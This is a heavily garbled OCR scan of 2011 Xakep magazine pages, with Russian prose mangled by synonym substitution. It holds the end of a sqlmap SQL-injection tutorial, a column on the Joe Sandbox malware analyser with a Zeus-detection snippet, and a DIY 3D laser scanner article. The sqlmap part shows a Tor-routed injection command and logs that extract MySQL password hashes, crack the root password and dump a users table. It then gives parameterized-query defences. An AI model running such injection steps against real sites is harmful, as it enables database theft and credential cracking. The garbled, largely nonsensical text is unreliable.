(INFO] actively fingerprinting MySQL
(е2:е8:27] (INFO] e xecutiпg MySQL comment injection fingerprint
[е2:е8:27]

web

apglicatioo~technolog}": РНР

0.2.6.

Apв.
a ""
chwe"--<c
0 "..
.2"-"·"9 _ _ _ _ __

ХАКЕР

00 / 053/2 011

Sqlmap, другими словами SQL-инъекции-это легко

0:/.g_ck:end J)f1.MS ~~~:tive._fi_Qggr_l)rin:t: 01y~QL__ >=5.],~12_ашL<. 0__,.5.0___ _
comment injection fingerl)rint: My_S_Q.,_L~Sc...,._1.,_,4".1~------____I;Ja nne_r__l)a rsingJinggд1rin:t ~C1y_S_Ql.2,1,4;1________________
banner:

"5.1.41-3-Ьро50+1"

После- прозвание текущего пользователя:

+- ------------ -+
Datab~testd~
[ 0 tаЫе],

[02 :08:28] [INFO] fetching-"c""u"rrue._,_n,_"t"-"u.._.s".eLr _ _ _ _ _ _ _ _ __
current user_:

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

+-- ------.: .--- -+._____________________ _
l_users_ _ _l
+-------------+

Далее получаем хеш равным образом всех пользовательских жете ролей равным образом выполня­
ем брутфорс-атаку в области словарю:

[02 :08 :,15] [INFO] Fetched dat~gged to text files under "/optL_
sg lmaJ)/outl)ut L~


W~
. s~i~
t~

.c~o""
m~
· ---------------

[02:08 :28]_[Ii"<FO] fetching database users 02assword hashes
Готово!

gq_y.Q!J_w_<~nt_tq щ~rform_<UJ:lctionary:_based att<~.e_lu!g<!iл.:;:t _r etrj.~~

password hashesl_[Y/n/q] У
[02 :08 :30] [INFO] using h_<~sh method "mysql_passwd "
what dictionary do you want to use?
[02 :08 :32] [INFO] u__:;;ing_deff)ul:!:.Jjictionary
[ 02 :08 :32] [INFO] loading dictionary_fur_".o""m_ _ _ _ _ _ _ _ __
__"/_qp_:t i.:;g lmapД_>G;L~ ord :Ц_:;_t . txt
_"_______________________ _
QQ_y_qu want to use common_pass_word s_uffixes? (slow!) [y/_N] _N__
[02 :08 :33] [INFO] starting dictionary-based cracking (mysql_passwd)
[02 :08 :35] [INFO] cracked password "testpass " for user " root"
database management system users password hashes:
[ * ] deЬian-syJ;-m_~int [1]_;_ _ __
__Qas sword hash: * 0B2C58EAB091C17760A223B088B601604F898847
[! ]_root [1];
password hash: *00E247AC5F9AF26AE0194B41E1E7690EE1429A29
clear-text password: testpass
Оп а! Для гооt " а автор памяти подобрали параль !для примера дьявол был
куда простой) . Пришло миг сдампить интересующие сверху не без; данные:

[02:08:35] [INFO] fetchin~;g-"d,.,at.,.a""b""as,.,e"-"n""a""me"-"s,__ _ _ __
[02:08:35] [INFO] fetching taЫes for databases:
information_schema, mysql, owasp10, testdb
[02 :08:35] [INFO] skipping system databases:
ioforma:tion_scheП@,_mysqL _ _ _ _ _ __
Database: owasp10,_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __
[ 0 taЫes]

КАК ЗАЩИТИТЬСЯ?

СЦЕНАРИЙ N2 З
Теперь, обнаружив во базе данных tеstdЬ-таблицу 0-О testdb) не без; интерес­
ным именем <<users>> 0-Т useгs), мы, естественно, заходим приобрести

ее начинка себя 0--dump). Но чтоб в соответствии с показывать сызнова одну интересную
опцию, отнюдь не будем имитировать всё-таки материал не мудрствуя лукаво на файле, а реплициру­
ем начинка таблиц на основанную возьми файлах базу данных 0Qlite сверху

локальной машине 0--гeplicate).

$ python sqlmap.py -u "http://www.site.com/vuln.phR?id=L___
--random-agent --tor --dum12 -D tes_"I;QQ_- Т users..=reR_.l,.,ic
,_ .,_,a..,t,_,e,____ _
Сканерунесоставиттрудаопределитьназваниястолбцовдля

таблицы useгs да запустить руку в чуждый карман с нее по сию пору записи:

[02 :11:26] [INFO] fetching columns for tаЫе "users" on database
" testdb"
[ 02 :11:26 ]_[INFO] fetching entries for tаЫе "users"
__:_tg~j;Q!L _____________________________
D_<~tabase:

testdb________

TaЫe:__]J__:;er L

[4 entries]
+--- -+-- ---- --+- ---------- -+
l__jJL_I name
0 surname

±.::.:..::.:.+- -- -.: .: .::: +--- --=-=-=-=
±-----------·-·-----------·····---·
.1_2_ 0 f!ufty_ l bunny
0 0 0_wu
0 ming
0 0 0 luther 0 Ыissett
0 0 0 NULL
0 nameisnulll
±.::_:- -+-- ---- --+:::
· _:_
--:.:-:.:·:::·_:_
--:.:·:.:·:::-_:_
-+!:.___ _ _ _ _ _ _ _ _ _ _ _ _ __
_[e2 :11:27 ]_[INFO] ТаЫе "testdb.users" dum11ed to s_glite3 file
Таким образом автор сих строк получим дамп базы данных на файле
sqliteЗ во формате

Наиболее надежным способом предотвращения 0QL-инъекций

0Qlite. Фишка

testdb.

на том, сколько на возле таком раскладе да мы вместе с тобой никак не

только лишь можем осмотреть данные, так до этого времени равным образом облечь в залупа и кровь ко ней любые

является употребление параметризированных 0QL-параметров. К

запросы, заюзав потенциал 0QLite !например, из через про­

примеру, на случае вместе с РНР сие к тому идет вместе с через батман кета PEAR"s 08

граммы 0Qlite Manageг).

l peaг. php . net/package/08 ), предлагающего интерфейс в целях выполнения
ни капельки безопасных 0QL-выражений. Обращение для БД происходит
следующим образом : $р

РЕЗЮМЕ

=$db->prepare( "SELECT * FROM users WHERE
id=?" ); $db->execute($p, array ($_GET[ "id " ])).Основная мысль за­

В прошлом номере на рубрике Pгoof-of-concept автор рассказывал тебе

ключается на том, в чем дело? даже если место параметров откровенно задана, ведь не возбраняется

по отношению

ни капельки безобидно передавать5QL-заnросы базе данных , наряду с

0QL-уязвимости. Идея заключалась во том, дай тебе сформировать эффектив­

возможностьдля параметров самим стать5QL-выражениями lв книжка

ный сканер, некоторый довольно славно работать, хотя исправлять быть этом

0555,

небольшом Руthоn-скрипте, какой-никакой умеетобнаруживать

числе зловредными). Стоит заметить, чтодругие механизмы, такие как бы

во

применение принудительного приведениятипов !например, не без; по­

0QL-уязвимостей- сие просто-напросто малая кусок дела. Их работа

мощью функции intvaiiJ) на связке со экранированием строк такими функ­
циями, на правах mysql_гeal_escape_ stгingl) иначе addslashesl), далеко не являются

000 строчек кода.

Это остающийся однажды доказывает, что такое? установление

-вопрос много сильнее сложный. Но его добро позаимствовать сверху лицензия

- sqlmap , во

котором я объединили долгий опытность огромного

целиком и полностью безопасными. Проблема на том, что такое? существуютнекоторые

количества пентестеров, с тем сканнер был в состоянии производительно никак не лишь только

варианты чтобы их обхода , а следственно , для их использованию необхо­

сыскивать 0QL-инъекции, однако да порождать с сего максимальную

димоподходитьсмаксимальнымвниманием.

выгоду. :В:

ХАКЕР

00 / 053/ 0011

031

PCZONE

Proof-of-Concept
ЗАПУСТИТЬ LINUX
В&РАУЭЕРЕ

То, ась? да мы со тобой увидели одним июльским к вечеру во редакции, впе­

чатлило нас накануне глубины души. Зайдя для сайт bellaгd.oгg/jslinux,
да мы от тобой увидели, как бы торчмя среди браузера стартует Linux-cиcтeмa,
со которой допускается трудиться так, во вкусе разве бы симпатия была запущена подина виртуальной машиной. Сперва нам показалось, почто сие

нетрудно эмуляторлинуксовой рента равно некоторых никсовых

ЗАЧЕМ ВООБЩЕ ТЫ ВСЁ
ЭТО ЗАТЕЯЛ? РАДИ ЧЕГО ?
Я хотел содеять своего рода Uпi х-по д обную
систему во спринклер ре. Я знаю насчёт существовании

проекта JS/U IX l www.m a sswe г k.at/ j s u ix l, так ме н пишущий эти строки
грела мнение относительно внутренние резервы из-за п ускать на спринклер ре
реальные бина рни ки Uпiх-команд . Изначально
ваш покорный слуга лишь только хотел воплотить в жизнь эмулятор пользова­

команд . Но весть поспешно получается ясно, зачем сие настоящий эмуля­

тельского окружения равным образом без остатка известить в

тор РС, некоторый без остатка написан получай JavaScгipt равным образом выполняется

з н а л , что-нибудь не без; п омощью сов р еме нны х JS-движков

по прямой во браузере! Можнодаже обоссать сверху Си применение равным образом от­

пр об щ е эмулировать всеобщий умная машина да сделано получи и распишись

JavaScript опора системы. Однако п озже автор этих строк осо­

нем врубать полновесный Liпux.

составлять его со через включенного в соответствии с умолчанию ком­

пилятора

TinyCC. Это нетрудно чума!

Какому крутышуудалось сие

реализовать? Вопросы отпадаютсами собой, нет-нет да и посмотришь

для копирайты. JavaScгipt РС Emulatoг [а в частности круглым счетом называется
проект] написал Фабрицио Беллард-создатель эмулятора

QEMU. Мы

решили распознать у него, в духе ему во голову могла подоспеть

такая безбашенная мнение . РоС получился за исключением всяких похвал.

ЧТО В ЭТОМ ОСОБЕННОГО?
Есть мало ли эмуляторов компьютера, равным образом автор во т ом

числе стою у истоков одного изо ни х IQEMUI.
JavaScript РС Emulator интересен тем , почто рабо­
тает на большинст на е б ра узеров равно не выделяя частностей н е тр е­
буе т установки. Конеч н о, некто достопримечательно медленнее,
хотя однако равн по отношению может ис п ользова ть ся, для примеру , во

образовательных ц елях. П оскольку адрес написан

нате чистом JavaScгipt "e, симпатия может п ос л стрела-змея ить н е­
пл охим бе нчм арком д ля измерение а пр оизво дитель ­
однако из ти JS-движков. Могу сказать, что-нибудь в ту же минуту пр что касается ­
ект быстрее стартует сверху

Jaeger Мопkеу, тот или иной

используется во Fiгefox 0, нежели во V81Chromel. Я п ока
безграмотный могу об ъ яс нить, на ч ем причин а, п оско ль ку

усишко пел на срок изучи ть адрес т олько J aegeг Мопkеу

IФаб рици что до - форменный гик-монстр . - П ри м.
редакции! .

КАКИЕ С ЭТ И М БЫЛИ СЛОЖНОСТИ?
Самая навороченная пакет проекта- зто,

конечно, эмулятор процессара х86. Пр оект зму­

лир условная единица т е щ е ря д усище трой от тв !последовательный
п орт, ко революция олле р пр ерыван ий, эмуля т крик те р­

вид л а!, хотя не без; процом возни было значительнее общем .
Тут по-над что касается п они мать: было бы не задавайся змулиро­

вать CPU вместе с RISС-архитектурой !какой- ни бай
MIPS alias ARM I, да куд а получше бы л в отношении бы держать
случай из-за п ускать ловкий х86 шифр .
Ведь во конечном счете з в таком случае позволит ради п ускать равно
др у ги е ОС, никак не тольк об Liпu x . Ещ е об дн а вместе с л ожнос ть
состояла на том, чт обы д обиться благопристойно й

пр оизводительности эмулятора во спринклер ре

!сейчас чтение работает во Fire fox равным образом Chrome l .
Я об нар ужил, ась? иные ко н струк ции
выполняются медл ен н ее, ч ем др у гие на тех но

самых браузерах . П озтому пришлось внушительно

JavaScript РС Emulator Быстрее токмо работает на Firefox

032

облегчать ко д . ~

ХАКЕР

00/153/2011

PCZONE

Степаня Ильин

ltwitter.com/stepah)

КОЛОНКАРЕДАКТОРА

Про разбирательство
малвари
а на же хотел отыскать бесхитростный да духовный орган

на хо ага на приложения лежит за пределами стандартных секций >>, «За пр а шив ает

ради анализа тесный вари. И кажется, нашел. В одном изо давниш-

вместе с писок запущенных процессов >>, << Содержит долгие sleep"ы (больше

них номеров моя персона поуже рассказывал относительно онлайн-сервисы, которые

предлагают метнуть мнительный бинарник во песочнице равным образом

0 минут! >>, <<Соз дает файлы шофер об на >> равным образом этак дале . Всего во базе Jo e
Sandbox Web в тот же миг 060 сигнатурдля а нализа поведения бинарника.

проанализироватьегодействиявсистеме. Д етальностыакихотчетов

Любую изо них не грех nодстроить подо близкие нужды. Ничего н е есть расчет

поражает: не запрещается вглядеться , какие ключи были соз даны на реестре,

наnисать да близкие собст во е нны е си гнат уры, воспользовавшись простым

для каким файлам происходили обращения, какие nерехваты функций

Руthоn-интерфейсом на обработки данных что до nоведении программы.

выполнялисьитакдалее.Некоторыеизтакихсервисовавтоматиче­

Приведу ради примера ча вместе с ть от игнатуры чтобы анализа Zeus"a, от через

д

скиделаютскри ншотприло женияипредла гаютполны йдампсетевой

которо го наша сестра обучаем сканнер откликаться в типичны е ради сего троя

активы так сти исследуемого приложения на РСАР-формате. Всему этому

соз даваемые файлы :

х озяйству далеко не хватаеттолько одного- некого интеллектуального

механизма, какой-никакой был в состоянии бы малограмотный только лишь расходовать сухие данные , а
до данный поры да прокомментировать их. То, аюшки? ваш покорный слуга такдавно хотел, автор этих строк обнаружил
наудачу во сервисе швейцарского исследователя Стефана Бюльмана.

zeusfiles=(..".k:_"Llwindowsl.l~stem32 "Ll ntos. е х е" , \._ _ _ _ __
[ . .. nропушено ... ]
"c:\~windows\\system32\ \ lowsec\\user.ds" ]

Его создание -Joe Sandbox Web ( www.joese c uгity. oгg l-тaк же,
в качестве кого да многие отдельные люди сервисы-песочницы, возвращает основательнейший
отчета поведении файла во системе, только от важным отличием. За число отсчетов
интеллектуального механизма автосканер понятным языком говорит насчёт праздник

активностибинар ника ,котораявызывае тnодо зре ния. «Инжектирует
РЕ - обложка во чужеродный тяжба >>, « Перехватывает бис winsосkеt-функций
с целью перехвата трафика>>, « Открывает морские ворота равно ждет во ходящи х подклю­

ч е ний >>, «Устанавливает хуки интересах функций, выводящие прейскурант файлов

def sig!]@tch(data):
if data(_:_t.un.C.]=="fileCreated" :
__ i f ctataj_:"_~J;atus "JJjлg(~ц!";..c_~s_::J..J-=._:J .;______
_ _...:#"-"-"
Прове):1яем,_п_g_падают ли_со;1данные файлы во блек-лист
for zeusfile in zeusfiles:
if data[ "path" ] .lower()==zeusfile :
zeusdetected=True

равно директориЙ >> - во рапорт попадают конкретные равно ясные формули­
ровки , понятные человеку, кой в соответствии с роду деятельности обыкновенно отнюдь не
зан имается анализом жмет вари. Все действие построение у ются сообразно степени

_ elif data[ "func" ]=="httR~"~"-------------------­
if~eusdetected:

оп асности . Я nеречислил кое-какие изо отдельно подозрительны х. Н в рассуждении лакомиться

#Извлекаем IР-адрес С&С-сервера

да отдельные люди маркеры, для которые быть анализе нужно превратить внимание,

if re.match( r "POST.*gate\.php" , data[ "request" ] , re.I):
zeusservers.append(data( "dstip" ])

нокоторыенеобязательносвидетель от твуютозловредномхарактере
приложения . Н а пример: « Отправля е т документация сверху ве б - се рвер >>, «Точка

Вообще подобная ра не без; ш иряемость дает Joe

Sandbox Web сто очков

вnеред п ере ддр угими конкурентами . Еще одной киллер-фичей
является как ми видится не без; ть исnользования Autolt-cкpиnтoв, так чтобы оnре­
д е брызгать дей от твия, которые должны nрои схо дить вот момент анализа
малвар и. То ест ь дозволено толково автоматизировать что придется взаимодей­
насчёт

er..t. • mutex to .-gnloo lnfected hoot8

насчёт

Pwformo DNS lookupo

что касается

Contolnolongol-• (< 0mln)

по части Р8
касательно

fllo eont81м иdloll8 wlth ........e.ndordlntrypolnt 01• oul81dellt8nd..t иdlом

не без; твие со системой равно nрило жениями (браузингопределенных страниц,
вставление форм , установку прило а ния равно эдак далее! . Тут нужно
nони мать: многие с д ействий малварь выnолняеттолько во случае
в з никнов е ния определенных событий . К nримеру, банковский т изобилие

может скликать эмпирика форм всего около nо се щ ении пользователем
определенны х сайтов.Сервиспозволяетобработатьподобнуюси­
туацию . С nомощью nро вместе с того скрипта наша сестра можем почерпнуть безвыгодный nр осто
отчетотом,что прои схо дитв не без; истемепослезапу ска равно сс ледуемого

приложения, однако да глубокий оценка того, что такое? прои сходит nри возникно­
вении обозначенных не без; обытий. Сценарии позв оляют е ще равным образом у nр авля ть
анализирующим движком : ко nримеру, соз д авать nри необходимости
скр иншот экрана либо включ а ть во нужном месте снифер на перехва­

та трафика. И зто едва малая пакет возможностей

Joe Sandbox Web.

Правда , во бесплатной версии сервиса они доступны далеко не все. А пользу кого
получения аж нелёгкая пл атного эккаунта придется известить 3 сьмо его
Разные цвета-разные степени опасности событий

ХАКЕР

00/153/2011

соз дателю. К счастью, отвечает симпатия быстро. Х

озз

PCZONE

ЭдуардГузь

00-сканеR
ради 00

КАКСОЗДАТЬ
0D-МОДЕЛЬ
ЛЮБОГО ПРЕДМЕТА
ПОДРУЧНЫМИ
СРЕДСТВАМИ

О 0D-СКАНИРОВАНИИ
М н насчёт г ие сфера н а ш ей ж да зн равно н ем ы со л им ы безо т рех м е рн ой г ра ф ики.

О г ромная а р ми аз многогрешный 0 D -мо дескать лл е р ов (ил да п в рассуждении насчет не без; т у 0 D " ш нико вl еже дн ев н об
соз д ае т мо д ели , ко т орые п отом усишко п е шн в отношении ис п что до ль зую т ся во са пишущий сии строки х ра з ны х

об л астях, начи н ая касательно т ки н ема т по части г рафа, р ек л амы, п пунш ышл е нн в рассуждении г что касается п ро­

разновидность со тв а, архитек т уры да зака нчи вая потому что г з н ает ч ем е щ е . Л юбой че л относительно ­
во ек, вслед за н имаю щ ийся мо д ели р относительно ван ием, р а н об иначе говоря п вал дн по части вместе с тал кивается
со из л е дую щ ей из-за д ачей: н ужак н насчёт соз д ать м од е л ь т в рассуждении го, ч ведь сделано су щ ествует

на н а ш ем тр ехмерном мире. Это можетб ыть ч т что касается у г что касается дн о. Н а п риме р ,
мо д е ль - пр ото оти п , которую держи т рев из так л п оложи л ордер чи для равным образом п по части п роси л

со д е л а ть <<то чн об где-то же, в таком случае ль ко на комок пь ю т ере>>. Пр равным образом ч е м вместе с мод е л иро во ать
н медянка н по части н е пр осто ч т об ы « б ыл по отношению п охоже>>, а чт об ы об ъ ек т-пр относительно тотип равным образом
тр ехме рн ая мо д е ль б ы ли для а для б л с нецы- б р а тья , р я д е л е нны е экра н ом
кусок пьют е р а. Так не без; л у чил вал да со м н ой. Вып что касается лн яя что до ч е р е дн ой индент п об
мо д е л иро на а н ию, автор сто л кнул от ваш покорнейший слуга из в отношении ч е нь жес тким да тр е б относительно на а ни ями п в рассуждении со ­

Профессиональный 0D-сканер,
из через которого не грех

оцифровать неподдельный объект,
получив его компьютерную
модель, есть смысл десятки тысяч

долларов . Мы но сможем про­
отозвать в таком случае но самое не без; через

специальной программы, лазер­

утнапиштим указки да веб-камеры. Всего
долларов из-за тридцатник .

031.

насчёт тв ет ств да ю моей м од е л равно об р я ц у для ли е нт а. П ос л е э нн в отношении го б езус п е ш так го
На сайте в один из дней работ·

со гл асова ния не без; та л что касается автор этих строк от н что до , ч в таком случае во эт в отношении т р а з н быстро н а абсо л ю тн а мы т что до чно со ть

чикa www.david­

мо д е л и. В относительно во не без; ваш покорнейший слуга кусок вместе с л у ч ае ко ли е нт б ыл у на е р е н , чт что до во пр что до тивн ом из л учае

laserscanner.
com вкушать идеал

yes л да равным образом н е н маг и волшебник т у п да т Арма г е дд по отношению н для того на се го че л насчёт во е ч йес тв а, т касательно п касательно для ра й н ей

заведование в рус­

мере из л учи т от моя особа ч т касательно -т в рассуждении п охожее. Чт относительно м н е ос т а торсион ос ьд е л а ть? П в отношении пр в рассуждении ­

ском языке . nрочти
его обязательно!
Там аспидски входя во все подробности
описаны равно требова­
ния для оборудованию,

потому что на а ть , получи и распишись ко н е ц , 0 D- ск фактически равным образом р по части во фактически да е ! Я ведь гд а е щ е п об д ума л: «Э т по отношению а

да последователь­

что до чень потому что льши х. Чтоб ы е г относительно ку п да ть, автор поперед л но н был у мн ожи ть со т оимост ь

ность сканирования,

мо делир в рассуждении на а н ие дл мы л е нивы х>> . Мин у та д е л а - да во сё, мо д е ль г об так ва ! К

мое м у на е л икомууд да вл е ни ю (и ра зо ча ро ванию! , ок а з ал ос ь , чт касательно д целых е
са пишущий сии строки й п рос те нь ко да й 0 D- ска н ер из тоит потому что льши х д е н е г. В е рн ее го на касательно ря ,

да непохожие нюансы ,

эт ой мо мол л равным образом н а ч ис л что до со высшая отметка ю н улями . Н по отношению р я н е ль з мы ку пить, з получай чи т,

которые могут у тебя

буд ем д е л а т ь сами. Н иже пишущий эти строки хо ч у п насчёт дескать накрапывать ся из т об й в рассуждении пытом, по образу мож н насчёт

завязаться .

соб р а ть 0 D -ска н ер близкие м да рукам равно . Я н е т касательно ль ко ра сскажу, ко а кие килоом п о­
неграмотный нты равно гд е ку без просыпа д л аз многогрешный э т что до г в рассуждении , н в рассуждении равным образом во вкусе сим ск фактически е р по части м п по отношению ль зо во а ть ся.

ХАКЕР

00 / 053/ 001 0

0D-сканер вслед $30

Чтонам
понадобится?

ЛАЗЕРНЫЙ МОДУЛЬ
Д ля работы сканера необходим комок ­
понент, кто хорэ даватьлинию.
Именно линию, а н е точку. Это важно! Н а

форумахяпро ч е~чтопо д ойдетобычная
китайскаялазернаяуказка,нозтоне

так. Как бы быстроты ни нет слов д гиттия рукой,

Смастерить собственный 0D-сканер , что оказалось,

вооруженнойлазерной указкой, сие

не запрещается положительно с подручных материалов :

всё невыгодный то. Чуть далее ваш покорный слуга объясню почему.
Сейчас мирово одного-нужен ска н ер,

нам потребуется специальная проект , ла­

зерная указка, веб-камера , а в свою очередь некоторые люди
самодельные средства .

DAVID"

СПЕЦИАЛЬНЫЙ СОФТ

кото р ый дает линию. Красный, зеленый,

синий-цветсканера далеко не важен . Вообще дозволительно быть да лишенный чего сканера ,

воспользовавшисьальтернатив н ыми решениями !читай кайфовый врезке) . Но
лазеровый модул ь-это совер ш енното чн об самый бесхитростный равно досту пн ый

вариант. Я приобрел часть красного лазера 050 н М со фокусировкой
контуры мощностью 0 м Вт, симпатия стоил 05долларов. Такой не грех сметь идеже

Самой важной долею сканера, во книжка

угодно, н а п ример на хозяйст во енном магази н е иначе путем равным образом нет, во вкусе сие

числе дорогостоящего профессио­

ес моя особа !кажется , во www . gгeeпlaseг. com . ua ) . Модули большей мо щ­

нального, является его мозг- про­

ности !до 00 м Вт) безвыгодный рекомендую приобретать, где-то в духе их употребление

г раммноеобеспечение,которое

трезво на оче н ь редких случаях. Е сть готовые модули со автоном ­

выполняет оцифровку. То, почто необхо­

ным питанием -если найде ш ь, так ку п равно отпустило такого склада . Мне а в целях своего

димо нам,- сие инструменты, которые

лазерного модуля пришлосьсоздать небольшую оснастку, с намерением было

щелка приволье надстройка скан равным образом ровать/оцифро вы­

удобнодержать на руке, включать/выключать. За п италя его обычной

вать трехмерные объекты вместе с через

кроной 0 В : пурпуровый сопровождение <<+ >>,черный <<->>: разве наоборот, так хорош

подручных средств: веб-камеры да

нагреваться и, в качестве кого результат, выйдет с строя вперед времени.

лазерной указки. Таковыми являют-

ся DAVID-Iaserscanner l www . david-laseгscaппeг.com ) да TriAngles
l www.intгicad . com ), доступные на свободного тестирования, да из

КАЛИБРОВОЧНЫЙ УГОЛ .

некоторыми ограничениями. Последний имеет достаточно неприятное

Ориентироваться на пространстве,

что касается г раниче н ие: д ля е г что до рабо т ы необхо д им р авномерно во ра щ ающийся

столик. возьми котором буд ет рас п олагаться сканируемый объект. К тому
а предъявляются суровые запросы для самому объекту. Его модель

должна оказываться б л изка ко цилин д рической, а е щ е лучше-сферической.

п олу ч ая вероятность считывать

размер изображения, позволяет
программе специальнаяприспосо­

ба- калибровальный уго л . Не бойся,

DAVID-Iaseгscanneг подобныхтребований безграмотный предъявляет, того

сие самый широкодоступный килоом п что до н ент,

автор этих строк выбрал его. Несмотря нате ведь аюшки? график платная равным образом ее ставка

представляющий собою двушник листа со

колеблется касательно т 099 давно 029 евро, т нашел т ировать ее дозволяется до какой степени нравиться

вместе с п е ц иально нанесенными маркера­

целую вечность -лимитов в области времени нет. Единственное окаймление заклю­

ми, которые нужно разместить подина

чается во особенностях сохра н ения результатов сканирования . Сохра­

домиком 00 °. После установки DAVID "a твоя милость

фибра сканы можно, н что касается во низком качестве. В п рочем, бери просторах Сети

найде ш ь файлы во формате PDF не так — не то CDR на кор н евом каталоге, напри­

равным образом н огд а случаются чудеса, да есть л равно тебе удочка астся откопать версию DAVID"a,

мер << Cali bp oiпts_Scale30 _ D IN _ A4.pdf >>. Или со аналогичным именем,

которая сохраняет на высоком качестве, значит, твоя милость сэкономишь равным образом получай

хотя на формате CDR чтобы печати с CoгeiDгaw . Выбери оный файл, слово

этом . А который равным образом щ ет-тот постоянно найдет.

которого соответс т вует формату бумаги , в ко т орой твоя милость собираешься
п ечатать . Вообще советую литься через размера сканируемого объек­
та . Не вместе с тоит действовать важный угол, кабы твоя милость собираешься просматривать

ВЕБ-КАМЕРА

маленькие объекты. Д ля вводные положения тотально подойдут калибровочные

П араметры объекта, необхо д имые

листы фо р мата А4. С л ожнее консолидировать их в области д п равильным углом. Свой

в целях составления объекта, утилита

основной жилище ваш покорный слуга есть так- нетрудно согнул мертвец гофрокартон , закре­

считывает не без; через веб-камеры.

пил его бери основе, впоследствии что прикрепил черта во рубеж калибровочные

О н а, возмож н о, у тебя есть. Е сли круглым счетом ­

листы. Л уч ш е их малограмотный для л еить, т ак каклисты ста н ут волнистыми -э т что до

прекрасно, можешь рисковать

неприемлемо . Вместо сего дозволяется прилежно приделать их сообразно краям

осуществить всё со ней . Главное, с тем

скотчем. Д олжен сказать, ась? задним числом п ервых но сканов отсюда следует понятно,

отчётливость было малограмотный в меньшей степени 040 х 080.

что-то угловая точка невыгодный идеальный. П оэтому рядом ш рогач всё п ереде л ать: автор этих строк сое д инил

Е сть да д ругие спрос : присутствие

неудовлетворительно куска ДСП , скрепив их у г олками. Получилось хорошо: раствор 00°,

шелковый фокусировки !возможности

катеноид без упрека ровная- токмо сего не позволяется было бы выудить

отключа т ьавтофокус), как минимум шумов

их совместность от DAV ID можем всего только я из тобой, оттого доверимся

-

подле высоком разрешении, качественная конденсор камеры -линза никак не

должна выдавать сильных искажений. Камера должна присоединяться

ко USВ-порту да трудиться нате WDМ-драйверах lт. е .• п опросту говоря,
должна оказываться видна д ля выбора на прог р амме DAV ID) . Боль ш равным образом н ство со­
временных веб-камер удовлетворяютэтим требованиям, хотя проэкзаменовать

не без; г офрокар т оном.Словом, т утестьм н ожествовариантов.

НИ В КОЕМ СЛУЧАЕ НЕ НАПРАВЛЯЙ ЛУЧ ПРЯМО В ГЛАЗА.

ЭТО ОЧЕНЬ ОПАСНО, ТАК КАК ЯРКОСТЬЛУЧА НАСТОЛЬКО

рекомен д а ц иям соз д а т е л ей п рограммы изумительный уклонение всяких неожи­

ВЕЛИКА, ЧТО ДАЖЕ КРАТКОВРЕМЕННОЕ ПОПАДАНИЕ В

данностей . Из мол ш евых камер самостоятельно создатель рекомендует Logitech

ГЛАЗ МОЖЕТ ВЫЖЕЧЬ СЕТЧАТКУ ГЛАЗА. ПОПАДАНИЕ НА

WebCam Рго 0000with cam holdeг, которую не грех оторвать д олларов вслед
вместе с т о. Я а усик п еш н об ваша милость п олня л ска н ирова н ия моей Log itech С270 стоимо­
стью рядом 05 долларов .

КОЖУ НЕ ОПАСНО. ВООБЩЕ РЕКОМЕНДУЮ ПРИОБРЕСТИ

ХАКЕР

00 / 053/2011

СПЕЦИАЛЬНЫЕ ОЧКИ ДЛЯ РАБОТЫ С ЛАЗЕРОМ, НО ЭТО УЖЕ
ПОТОМ, А НА ПЕРВЫХ ПОРАХ МОЖНО И БЕЗ НИХ.

035

PCZONE

Какэто
происходит?
Теперь самое интересное - близ от т упаем ко самому пр оцессу ска­

нирования. Оглянись вокруг: во комна т е конечно найдутся какие­
нибудь сувениры не в таком случае — не то ста т уэтки -дл моя особа экспериментов подойдет
какой приглянется куцый объект. Чт касательно аккуратно безвыгодный годится, беспричинно сие прозрач ны е
или — или п олупрозрачные nр е дме ты. Л уч лазера повинен отражат ь ся, а отнюдь не

поглощаться предметами . Созда т ели DAVID "a рекомендуют во т аких
случаях накрывать nредметы тальком не так — не то , ежели никак не жалко, аэро­

зольной краской. Я невыгодный утруждал себя да взял ряд статуэток.
Условно на процессе скани р по отношению на а н ия мож н касательно распределить четверка каста п а,

расскажу касательно каждом п касательно д робнее.

Сканирование: со светом да лишенный чего

0 ЭТАП
всё из д ела н относительно nравильно, пр что до гра мма объединение э др ави тте бя, ась? кали б яр ка

Калибровка

пр ошла усик п ешно. В пр что касается ти на н ом со лучае позволено попроб по отношению вать поменять

Это прежний сия п, п оэтому объек т в целях не без; канирования на срок

месторасположение во еб-камеры, поиграться вместе с яркостью равно кон тра стом. У меня

отложим во сторону. Закрепивеб-камеру назло калибровочногоугла

получилось малограмотный из п ервого раза, однако следом радости было вроде п осле первой

таким образом, с намерением целое компоненты были неподвижны относи­

вместе с данной сессии!

тельнодругдруга.Камерустоитрасположитьнауровненижнегокрая

калибровочных листов. Во промежуток времени калибровки камеры рисунок
надо существовать ярким . Я выполнял ска нир ование вечор либо днем, хотя

0ЭТАП

из затененным окном, а градуировочный румб осве щ ал искусствен ным

Размещениеобъекта

светом . Сама дорнование осу щ ест вл яется во DAVID-I aseгscanneг.

Дл аз многогрешный скани р ова ния делать нечего разместить объек т на у гл у калибровоч­

Выбираем изо вместе с 14 ска усик трой ст на отечественный у веб-камеру, н аст раива ем изо­

н ого угла . Для лучшего результата в отношении н д касательно л жен составлять близ близи т е льн об п касательно ­

браже ни е : п овы ш аем яркос ть, контраст. В результате сверху эка ране видны

сере дин е калибровочных ли стов . Е вместе с ли е го размеры небольши е, позволено

лишь черные маркеры. Жмем кно пк у << Калибровать камеру». Е вместе с ли

истощить подставку: коробку, книги, д ере на ваш покорный слуга нны й оселок под­
хо дящ его размера. Укажи пр ограмме вид используемого лазера. Д а л ее
тушим вместе с вет ! На экране д олжно существовать туманно . Если малограмотный круглым счетом - понижаем

С OAVID· Laserscanner

!

значения яркости. Н е пугайся, разве маркеров никак не видно: пр ограмма

з апомнила их расположение, равным образом днесь они нам невыгодный в такой степени важны. Включи
выход е р да направь его получи и распишись пристанище символически меньше нашего nредмета. На экране

должна взору ломаная белая головка контур [программа анализирует
черно-белое изображение) . Расстояние в ряду камерой равно пл оскостью
лазера [т. е . триангуляционный угол) приходится фигурировать в таковой степени мука шим ,
в какой степени сие возможно, - сие нужно про цисталгия ш ей точн ости. Иначеты

увиди шь предупреждение: « У г ол пересечения от лиш кусок узкий >>. В нач але

~ Изменитьс:рорt11ат

J

статьияотговорил т ебяотис п ользова ни яточеч н ой ла зернойуказки,
равно гляди поч ему. Да но быст р относительно умереть и невыгодный встать д моя персона т насчёт ч ечной указкой, твоя милость безвыгодный тольк касательно н е по­
лучишь ровную линию, н об равно пр ограмма н е сможет соответственно не без; чи та ть величину
триангуляционного у гл а.

Моаитоб (мм):

